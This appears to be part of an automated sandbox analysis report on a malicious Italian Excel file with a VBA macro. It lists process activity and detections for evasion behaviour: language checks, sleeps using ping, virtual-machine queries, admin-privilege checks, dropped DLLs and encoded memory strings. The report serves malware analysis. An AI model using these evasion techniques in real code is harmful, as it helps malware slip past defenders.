Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Detected evasive VBA macro (language check)

Show sources

Source: MIL0001742828.xls	Stream path '_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro' : found possibly 'Application.LanguageSettings.Languageid' functions application.languagesettings.languageid
Source: VBA code instrumentation	OLE, VBA macro: Module Questa_cartella_di_lavoro, Function Finesta, found possibly 'Application.LanguageSettings.Languageid' functions application.languagesettings.languageid			Name: Finesta

Uses ping.exe to sleep

Show sources

Source: unknown	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Document contains an embedded VBA which might only executes on specific systems (country or language check)

Show sources

Source: MIL0001742828.xls	Stream path '_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro' : Riga = msoLanguageIDUIEnd FunctionPrivate Function Finesta
Source: MIL0001742828.xls	Stream path '_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro' : plication.LanguageSettings.LanguageID(Riga)End FunctionF

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 581			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 457			Jump to behavior

Found dropped PE file which has not been started or loaded

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ygdsonvv.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\v0kgxdqm.dll			Jump to dropped file

Found evasive API chain checking for process token information

Show sources

Source: C:\Windows\System32\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_8-3214

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\wbem\WMIC.exe TID: 3932	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2084	Thread sleep time: -34860000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2084	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4000	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 3384	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1508	Thread sleep time: -1020000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1508	Thread sleep time: -60000s >= -30000s

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - select * from Win32_ComputerSystemProduct

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 8_2_00451098 memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

8_2_00451098

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch	Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: explorer.exe, 0000001E.00000000.2607897010.02A60000.00000004.00000001.sdmp	Binary or memory string: MBAAAEAFCAAAAAAAADAAAAAAAY0gAAQBRAAAAYusWo/KEocA+ldcX8DBKHgfZH3F/QgyBAAEAAAAAAAABAAAAAAAAAAAAAAAAAAAAsZAUAwHQB+TQDi66kGEiiNCAsCMw0ZGA8yQ6wFAAAAAAAAAAAAAAAAAAAAAAAAA0BQMAAAAAAwBLN2XRAQVzVmczBAYAgAAEAw7+6uOjSxBLN2XqAAAAoVAAAAAAEAAAAAAAAAAAAgNAAAAAAQVAMHAlBgcAMHAAAAQAMHAoBQZAwGAsBwMAIDAuAAZAwGAsBALA0CAyAQMAgDAxAwMAAAAUAAeAEDAAAAAAwoPSMREAAVdixWajBAAiBACAQAAv7r76MKFM6jEToCAAAA7BAAAAAQAAAAAAAAAAAAA4AAAAAAAQBQdAIGAsBQaAMGAAAAQAMHAoBQZAwGAsBwMAIDAuAAZAwGAsBALA0CAyAQMAgDAxAgNAAAAWAAgAEDAAAAAA4uO8aSEAQ0TDVVTF5XMAAAaAgAAEAw7+6uOjSh76wrJqAAAA4eAAAAAAEAAAAAAAAAAAAgPAAAAAAARA8GAjBQdA0GAlBgbAQHAzBAAAAEAzBAaAUGAsBAbAMDAyAgLAQGAsBAbAwCAtAgMAEDA4AAMAEDAAAAGAAAAzBAAAwBAAAwAAAAAcAAAA0CAAAAOAAAAiBAAAEBAAAwAAAAAzCGi0ABAAAAADpDXVNXZyNHXAAgKAAAACAAAAQBAAAAAAAAAAAgAAwFXIVkUCJETBN0SCVlUOxVVzVmczBAU1JGbpNGXE92Y11WZuR3cAABAAAQBAAAouAAAAkZAAAAHAAAALAAAg+KJI1O5cjaRBKO/5VGC2QTmBAAAVCAAAkAAAAaiAAAAxMFUTJuiYZEvMhzQ7y/ETaCmt5cbAAAAEAAAAAwHAAAAuAAAAMFAtAQMA0CA1AQLAIDAxAQLAIDA5AAMAEDA3AgMAQDAwAAMA0CAyAAOAIDA4AwMAUDAyAQOAEDA2AQLAIDA4AwMAIDA5AwNA
Source: explorer.exe, 0000001E.00000000.2607897010.02A60000.00000004.00000001.sdmp	Binary or memory string: I@oVmciJGbhN2aiVncuBAAAYRqMzNQvfPQC2obJf4QsE1j2NO6pu35R4pryKsd/yJiWkKzcD073DkgN6WyHOELR9odjjeq7deEe6qsCb3vciIAAAAAers`
Source: explorer.exe, 0000001E.00000000.2607897010.02A60000.00000004.00000001.sdmp	Binary or memory string: MBAAAEAFCAAAAAAAADAAAAAAAY0gAAQBRAAAAUEFZo/KEocA4vLOr1DBKHA+7iza9QgyBAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAkZAUAwHQB+TQDi66kGEiiNCAsCMw0ZGA8yQ6wFAAAAAAAAAAAAAAAAAAAAAAAAA0BQMAAAAAAwBLN2XRAQVzVmczBAYAgAAEAw7+6uOjSxBLN2XqAAAAoVAAAAAAEAAAAAAAAAAAAgNAAAAAAQVAMHAlBgcAMHAAAAQAMHAoBQZAwGAsBwMAIDAuAAZAwGAsBALA0CAyAQMAgDAxAwMAAAAUAAeAEDAAAAAAwoPSMREAAVdixWajBAAiBACAQAAv7r76MKFM6jEToCAAAA7BAAAAAQAAAAAAAAAAAAA4AAAAAAAQBQdAIGAsBQaAMGAAAAQAMHAoBQZAwGAsBwMAIDAuAAZAwGAsBALA0CAyAQMAgDAxAgNAAAAWAgfAEDAAAAAA4uO9USEAAVajRXdyV2cAAgZAgAAEAw7+6uOjSh760TJqAAAAQfAAAAAAEAAAAAAAAAAAAAPAAAAAAAUAkGAjBAdAUHAyBQZAMHAAAAQAMHAoBQZAwGAsBwMAIDAuAAZAwGAsBALA0CAyAQMAgDAwAgMAAAAYAAAAIHAAAAHAAAADAAAAwBAAAQLAAAA4AAAAIGAAAQEAAAADAAAAMLYISDEAAAAAMkOcV1clJ3ccBAAqAAAAIAAAAAFAAAAAAAAAAAACAAXchURSJkQMF0QLJUVS5EXVNXZyNHAQVnYsl2YcBVajRXdyV2cAABAAAQBAAAo2AAAAcZAAAAHAAAALAAAga4+rb7BpxTQae/TCvK88V8lBAAAVCAAAkAAAAaiAAAAxMFUTJuiYZEvMhzQ7y/ETaCmt5cbAAAAEAAAAAwHAAAAuAAAAMFAtAQMA0CA1AQLAIDAxAQLAIDA5AAMAEDA3AgMAQDAwAAMA0CAyAAOAIDA4AwMAUDAyAQOAEDA2AQLAIDA4AwMAIDA5AwNAMDAz
Source: explorer.exe, 0000001E.00000000.2610098055.03A39000.00000004.00000001.sdmp	Binary or memory string: MBAAAEAFCAAAAAAAADAAAAAAAY0gAAQBRAAAAUEFZo/KEocA4vLOr1DBKHA+7iza9QgyBAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAkZAUAwHQB+TQDi66kGEiiNCAsCMw0ZGA8yQ6wFAAAAAAAAAAAAAAAAAAAAAAAAA0BQMAAAAAAwBLN2XRAQVzVmczBAYAgAAEAw7+6uOjSxBLN2XqAAAAoVAAAAAAEAAAAAAAAAAAAgNAAAAAAQVAMHAlBgcAMHAAAAQAMHAoBQZAwGAsBwMAIDAuAAZAwGAsBALA0CAyAQMAgDAxAwMAAAAUAAeAEDAAAAAAwoPSMREAAVdixWajBAAiBACAQAAv7r76MKFM6jEToCAAAA7BAAAAAQAAAAAAAAAAAAA4AAAAAAAQBQdAIGAsBQaAMGAAAAQAMHAoBQZAwGAsBwMAIDAuAAZAwGAsBALA0CAyAQMAgDAxAgNAAAAWAgfAEDAAAAAA4uO9USEAAVajRXdyV2cAAgZAgAAEAw7+6uOjSh760TJqAAAAQfAAAAAAEAAAAAAAAAAAAAPAAAAAAAUAkGAjBAdAUHAyBQZAMHAAAAQAMHAoBQZAwGAsBwMAIDAuAAZAwGAsBALA0CAyAQMAgDAwAgMAAAAYAAAAIHAAAAHAAAADAAAAwBAAAQLAAAA4AAAAIGAAAQEAAAADAAAAMLYISDEAAAAAMkOcV1clJ3ccBAAqAAAAIAAAAAFAAAAAAAAAAAACAAXchURSJkQMF0QLJUVS5EXVNXZyNHAQVnYsl2YcBVajRXdyV2cAABAAAQBAAAo2AAAAcZAAAAHAAAALAAAga4+rb7BpxTQae/TCvK88V8lBAAAVCAAAkAAAAaiAAAAxMFUTJuiYZEvMhzQ7y/ETaCmt5cbAAAAEAAAAAwHAAAAuAAAAMFAtAQMA